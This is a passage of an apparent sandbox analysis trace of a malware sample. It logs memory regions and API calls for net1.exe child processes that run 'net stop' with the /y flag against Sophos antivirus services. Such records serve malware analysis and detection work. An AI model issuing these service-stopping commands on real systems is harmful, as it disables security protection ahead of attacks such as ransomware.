0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4406 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4407 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 4408 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 4409 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4410 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4411 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4412 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4413 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4414 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4415 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4507 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 419 os_tid = 0xf1c [0084.918] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10f850 | out: lpSystemTimeAsFileTime=0x10f850*(dwLowDateTime=0xe7c8e010, dwHighDateTime=0x1d48689)) [0084.918] GetCurrentProcessId () returned 0xf20 [0084.918] GetCurrentThreadId () returned 0xf1c [0084.918] GetTickCount () returned 0x1f19e [0084.918] QueryPerformanceCounter (in: lpPerformanceCount=0x10f858 | out: lpPerformanceCount=0x10f858*=1813183600000) returned 1 [0084.919] GetModuleHandleW (lpModuleName=0x0) returned 0xfffd0000 [0084.919] __set_app_type (_Type=0x1) [0084.919] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfffe9c9c) returned 0x0 [0084.919] __getmainargs (in: _Argc=0xffff4780, _Argv=0xffff4790, _Env=0xffff4788, _DoWildCard=0, _StartInfo=0xffff479c | out: _Argc=0xffff4780, _Argv=0xffff4790, _Env=0xffff4788) returned 0 [0084.919] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0084.919] GetConsoleOutputCP () returned 0x1b5 [0084.919] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffffcec0 | out: lpCPInfo=0xffffcec0) returned 1 [0084.920] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0084.921] sprintf_s (in: _DstBuf=0x10f7f8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0084.921] setlocale (category=0, locale=".437") returned="English_United States.437" [0084.922] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0084.922] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0084.922] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos Safestore Service\" /y" [0084.923] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x10f590, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0084.923] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0084.923] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x10f7e8 | out: Buffer=0x10f7e8*=0x31c0f0) returned 0x0 [0084.923] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x10f7e8 | out: Buffer=0x10f7e8*=0x31c110) returned 0x0 [0084.923] _fileno (_File=0x7fefdba2a80) returned 0 [0084.923] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0084.923] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0084.923] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0084.923] _wcsicmp (_String1="config", _String2="stop") returned -16 [0084.923] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0084.923] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0084.923] _wcsicmp (_String1="file", _String2="stop") returned -13 [0084.923] _wcsicmp (_String1="files", _String2="stop") returned -13 [0084.923] _wcsicmp (_String1="group", _String2="stop") returned -12 [0084.923] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0084.923] _wcsicmp (_String1="help", _String2="stop") returned -11 [0084.923] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0084.923] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0084.923] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0084.923] _wcsicmp (_String1="session", _String2="stop") returned -15 [0084.923] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0084.923] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0084.923] _wcsicmp (_String1="share", _String2="stop") returned -12 [0084.923] _wcsicmp (_String1="start", _String2="stop") returned -14 [0084.923] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0084.923] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0084.924] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0084.924] _wcsicmp (_String1="accounts", _String2="Sophos Safestore Service") returned -18 [0084.924] _wcsicmp (_String1="computer", _String2="Sophos Safestore Service") returned -16 [0084.924] _wcsicmp (_String1="config", _String2="Sophos Safestore Service") returned -16 [0084.924] _wcsicmp (_String1="continue", _String2="Sophos Safestore Service") returned -16 [0084.924] _wcsicmp (_String1="cont", _String2="Sophos Safestore Service") returned -16 [0084.924] _wcsicmp (_String1="file", _String2="Sophos Safestore Service") returned -13 [0084.924] _wcsicmp (_String1="files", _String2="Sophos Safestore Service") returned -13 [0084.924] _wcsicmp (_String1="group", _String2="Sophos Safestore Service") returned -12 [0084.924] _wcsicmp (_String1="groups", _String2="Sophos Safestore Service") returned -12 [0084.924] _wcsicmp (_String1="help", _String2="Sophos Safestore Service") returned -11 [0084.924] _wcsicmp (_String1="helpmsg", _String2="Sophos Safestore Service") returned -11 [0084.924] _wcsicmp (_String1="localgroup", _String2="Sophos Safestore Service") returned -7 [0084.924] _wcsicmp (_String1="pause", _String2="Sophos Safestore Service") returned -3 [0084.924] _wcsicmp (_String1="session", _String2="Sophos Safestore Service") returned -10 [0084.924] _wcsicmp (_String1="sessions", _String2="Sophos Safestore Service") returned -10 [0084.924] _wcsicmp (_String1="sess", _String2="Sophos Safestore Service") returned -10 [0084.924] _wcsicmp (_String1="share", _String2="Sophos Safestore Service") returned -7 [0084.924] _wcsicmp (_String1="start", _String2="Sophos Safestore Service") returned 5 [0084.924] _wcsicmp (_String1="stats", _String2="Sophos Safestore Service") returned 5 [0084.924] _wcsicmp (_String1="statistics", _String2="Sophos Safestore Service") returned 5 [0084.924] _wcsicmp (_String1="stop", _String2="Sophos Safestore Service") returned 5 [0084.924] _wcsicmp (_String1="time", _String2="Sophos Safestore Service") returned 1 [0084.924] _wcsicmp (_String1="user", _String2="Sophos Safestore Service") returned 2 [0084.924] _wcsicmp (_String1="users", _String2="Sophos Safestore Service") returned 2 [0084.924] _wcsicmp (_String1="msg", _String2="Sophos Safestore Service") returned -6 [0084.924] _wcsicmp (_String1="messenger", _String2="Sophos Safestore Service") returned -6 [0084.924] _wcsicmp (_String1="receiver", _String2="Sophos Safestore Service") returned -1 [0084.924] _wcsicmp (_String1="rcv", _String2="Sophos Safestore Service") returned -1 [0084.924] _wcsicmp (_String1="netpopup", _String2="Sophos Safestore Service") returned -5 [0084.924] _wcsicmp (_String1="redirector", _String2="Sophos Safestore Service") returned -1 [0084.924] _wcsicmp (_String1="redir", _String2="Sophos Safestore Service") returned -1 [0084.924] _wcsicmp (_String1="rdr", _String2="Sophos Safestore Service") returned -1 [0084.924] _wcsicmp (_String1="workstation", _String2="Sophos Safestore Service") returned 4 [0084.924] _wcsicmp (_String1="work", _String2="Sophos Safestore Service") returned 4 [0084.924] _wcsicmp (_String1="wksta", _String2="Sophos Safestore Service") returned 4 [0084.924] _wcsicmp (_String1="prdr", _String2="Sophos Safestore Service") returned -3 [0084.924] _wcsicmp (_String1="devrdr", _String2="Sophos Safestore Service") returned -15 [0084.924] _wcsicmp (_String1="lanmanworkstation", _String2="Sophos Safestore Service") returned -7 [0084.924] _wcsicmp (_String1="server", _String2="Sophos Safestore Service") returned -10 [0084.924] _wcsicmp (_String1="svr", _String2="Sophos Safestore Service") returned 7 [0084.924] _wcsicmp (_String1="srv", _String2="Sophos Safestore Service") returned 3 [0084.924] _wcsicmp (_String1="lanmanserver", _String2="Sophos Safestore Service") returned -7 [0084.925] _wcsicmp (_String1="alerter", _String2="Sophos Safestore Service") returned -18 [0084.925] _wcsicmp (_String1="netlogon", _String2="Sophos Safestore Service") returned -5 [0084.925] _wcsupr (in: _String="Sophos Safestore Service" | out: _String="SOPHOS SAFESTORE SERVICE") returned="SOPHOS SAFESTORE SERVICE" [0084.925] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x31ce20 [0085.138] GetServiceKeyNameW (in: hSCManager=0x31ce20, lpDisplayName="SOPHOS SAFESTORE SERVICE", lpServiceName=0xffff5750, lpcchBuffer=0x10f708 | out: lpServiceName="", lpcchBuffer=0x10f708) returned 0 [0085.139] _wcsicmp (_String1="msg", _String2="SOPHOS SAFESTORE SERVICE") returned -6 [0085.139] _wcsicmp (_String1="messenger", _String2="SOPHOS SAFESTORE SERVICE") returned -6 [0085.139] _wcsicmp (_String1="receiver", _String2="SOPHOS SAFESTORE SERVICE") returned -1 [0085.139] _wcsicmp (_String1="rcv", _String2="SOPHOS SAFESTORE SERVICE") returned -1 [0085.139] _wcsicmp (_String1="redirector", _String2="SOPHOS SAFESTORE SERVICE") returned -1 [0085.139] _wcsicmp (_String1="redir", _String2="SOPHOS SAFESTORE SERVICE") returned -1 [0085.139] _wcsicmp (_String1="rdr", _String2="SOPHOS SAFESTORE SERVICE") returned -1 [0085.139] _wcsicmp (_String1="workstation", _String2="SOPHOS SAFESTORE SERVICE") returned 4 [0085.139] _wcsicmp (_String1="work", _String2="SOPHOS SAFESTORE SERVICE") returned 4 [0085.139] _wcsicmp (_String1="wksta", _String2="SOPHOS SAFESTORE SERVICE") returned 4 [0085.139] _wcsicmp (_String1="prdr", _String2="SOPHOS SAFESTORE SERVICE") returned -3 [0085.139] _wcsicmp (_String1="devrdr", _String2="SOPHOS SAFESTORE SERVICE") returned -15 [0085.139] _wcsicmp (_String1="lanmanworkstation", _String2="SOPHOS SAFESTORE SERVICE") returned -7 [0085.139] _wcsicmp (_String1="server", _String2="SOPHOS SAFESTORE SERVICE") returned -10 [0085.139] _wcsicmp (_String1="svr", _String2="SOPHOS SAFESTORE SERVICE") returned 7 [0085.139] _wcsicmp (_String1="srv", _String2="SOPHOS SAFESTORE SERVICE") returned 3 [0085.139] _wcsicmp (_String1="lanmanserver", _String2="SOPHOS SAFESTORE SERVICE") returned -7 [0085.139] _wcsicmp (_String1="alerter", _String2="SOPHOS SAFESTORE SERVICE") returned -18 [0085.139] _wcsicmp (_String1="netlogon", _String2="SOPHOS SAFESTORE SERVICE") returned -5 [0085.139] NetServiceControl (in: servername=0x0, service="SOPHOS SAFESTORE SERVICE", opcode=0x0, arg=0x0, bufptr=0x10f710 | out: bufptr=0x10f710) returned 0x889 [0085.140] wcscpy_s (in: _Destination=0xffff80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0085.140] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0085.140] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffff5b50, nSize=0x800, Arguments=0xffff7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0085.141] GetFileType (hFile=0xb) returned 0x2 [0085.142] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f5d8 | out: lpMode=0x10f5d8) returned 1 [0085.142] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffff5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x10f5d0, lpReserved=0x0 | out: lpBuffer=0xffff5b50*, lpNumberOfCharsWritten=0x10f5d0*=0x1e) returned 1 [0085.142] GetFileType (hFile=0xb) returned 0x2 [0085.142] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f5d8 | out: lpMode=0x10f5d8) returned 1 [0085.142] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfffd1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10f5d0, lpReserved=0x0 | out: lpBuffer=0xfffd1efc*, lpNumberOfCharsWritten=0x10f5d0*=0x2) returned 1 [0085.143] _ultow (in: _Dest=0x889, _Radix=1111616 | out: _Dest=0x889) returned="2185" [0085.143] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffff5b50, nSize=0x800, Arguments=0xffff7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0085.143] GetFileType (hFile=0xb) returned 0x2 [0085.143] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f5d8 | out: lpMode=0x10f5d8) returned 1 [0085.143] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffff5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x10f5d0, lpReserved=0x0 | out: lpBuffer=0xffff5b50*, lpNumberOfCharsWritten=0x10f5d0*=0x34) returned 1 [0085.143] GetFileType (hFile=0xb) returned 0x2 [0085.144] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f5d8 | out: lpMode=0x10f5d8) returned 1 [0085.144] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfffd1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10f5d0, lpReserved=0x0 | out: lpBuffer=0xfffd1efc*, lpNumberOfCharsWritten=0x10f5d0*=0x2) returned 1 [0085.144] NetApiBufferFree (Buffer=0x31c0f0) returned 0x0 [0085.144] NetApiBufferFree (Buffer=0x31c110) returned 0x0 [0085.144] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos Safestore Service\" /y" [0085.144] exit (_Code=2) Process: id = "76" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x21bde000" os_pid = "0xc40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "69" os_parent_pid = "0xca8" cmd_line = "C:\\Windows\\system32\\net1 stop \"Sophos System Protection Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4416 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4417 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4418 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4419 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 4420 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4421 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4422 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4423 start_va = 0xfffd0000 end_va = 0x100002fff entry_point = 0xfffd0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 4424 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4425 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4426 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 4427 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4428 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 4429 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4430 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4431 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4432 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4433 start_va = 0x280000 end_va = 0x2e6fff entry_point = 0x280000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4434 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 4435 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 4436 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4437 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4438 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4439 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 4440 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 4441 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4442 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4443 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4444 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4445 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 4446 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 4447 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4448 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4449 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4450 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4451 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4452 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4453 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4508 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 420 os_tid = 0xdfc [0085.056] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fc50 | out: lpSystemTimeAsFileTime=0x12fc50*(dwLowDateTime=0xe7de4c70, dwHighDateTime=0x1d48689)) [0085.056] GetCurrentProcessId () returned 0xc40 [0085.056] GetCurrentThreadId () returned 0xdfc [0085.056] GetTickCount () returned 0x1f22a [0085.056] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc58 | out: lpPerformanceCount=0x12fc58*=1813197400000) returned 1 [0085.057] GetModuleHandleW (lpModuleName=0x0) returned 0xfffd0000 [0085.057] __set_app_type (_Type=0x1) [0085.057] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfffe9c9c) returned 0x0 [0085.057] __getmainargs (in: _Argc=0xffff4780, _Argv=0xffff4790, _Env=0xffff4788, _DoWildCard=0, _StartInfo=0xffff479c | out: _Argc=0xffff4780, _Argv=0xffff4790, _Env=0xffff4788) returned 0 [0085.057] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0085.057] GetConsoleOutputCP () returned 0x1b5 [0085.057] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffffcec0 | out: lpCPInfo=0xffffcec0) returned 1 [0085.057] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0085.059] sprintf_s (in: _DstBuf=0x12fbf8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0085.059] setlocale (category=0, locale=".437") returned="English_United States.437" [0085.179] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0085.179] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0085.179] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos System Protection Service\" /y" [0085.179] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12f990, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0085.179] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0085.179] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12fbe8 | out: Buffer=0x12fbe8*=0x19c120) returned 0x0 [0085.179] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12fbe8 | out: Buffer=0x12fbe8*=0x19c140) returned 0x0 [0085.179] _fileno (_File=0x7fefdba2a80) returned 0 [0085.179] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0085.179] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0085.179] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0085.179] _wcsicmp (_String1="config", _String2="stop") returned -16 [0085.180] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0085.180] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0085.180] _wcsicmp (_String1="file", _String2="stop") returned -13 [0085.180] _wcsicmp (_String1="files", _String2="stop") returned -13 [0085.180] _wcsicmp (_String1="group", _String2="stop") returned -12 [0085.180] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0085.180] _wcsicmp (_String1="help", _String2="stop") returned -11 [0085.180] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0085.180] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0085.180] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0085.180] _wcsicmp (_String1="session", _String2="stop") returned -15 [0085.180] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0085.180] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0085.180] _wcsicmp (_String1="share", _String2="stop") returned -12 [0085.180] _wcsicmp (_String1="start", _String2="stop") returned -14 [0085.180] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0085.180] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0085.180] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0085.180] _wcsicmp (_String1="accounts", _String2="Sophos System Protection Service") returned -18 [0085.180] _wcsicmp (_String1="computer", _String2="Sophos System Protection Service") returned -16 [0085.180] _wcsicmp (_String1="config", _String2="Sophos System Protection Service") returned -16 [0085.180] _wcsicmp (_String1="continue", _String2="Sophos System Protection Service") returned -16 [0085.180] _wcsicmp (_String1="cont", _String2="Sophos System Protection Service") returned -16 [0085.180] _wcsicmp (_String1="file", _String2="Sophos System Protection Service") returned -13 [0085.180] _wcsicmp (_String1="files", _String2="Sophos System Protection Service") returned -13 [0085.180] _wcsicmp (_String1="group", _String2="Sophos System Protection Service") returned -12 [0085.180] _wcsicmp (_String1="groups", _String2="Sophos System Protection Service") returned -12 [0085.180] _wcsicmp (_String1="help", _String2="Sophos System Protection Service") returned -11 [0085.180] _wcsicmp (_String1="helpmsg", _String2="Sophos System Protection Service") returned -11 [0085.180] _wcsicmp (_String1="localgroup", _String2="Sophos System Protection Service") returned -7 [0085.180] _wcsicmp (_String1="pause", _String2="Sophos System Protection Service") returned -3 [0085.180] _wcsicmp (_String1="session", _String2="Sophos System Protection Service") returned -10 [0085.180] _wcsicmp (_String1="sessions", _String2="Sophos 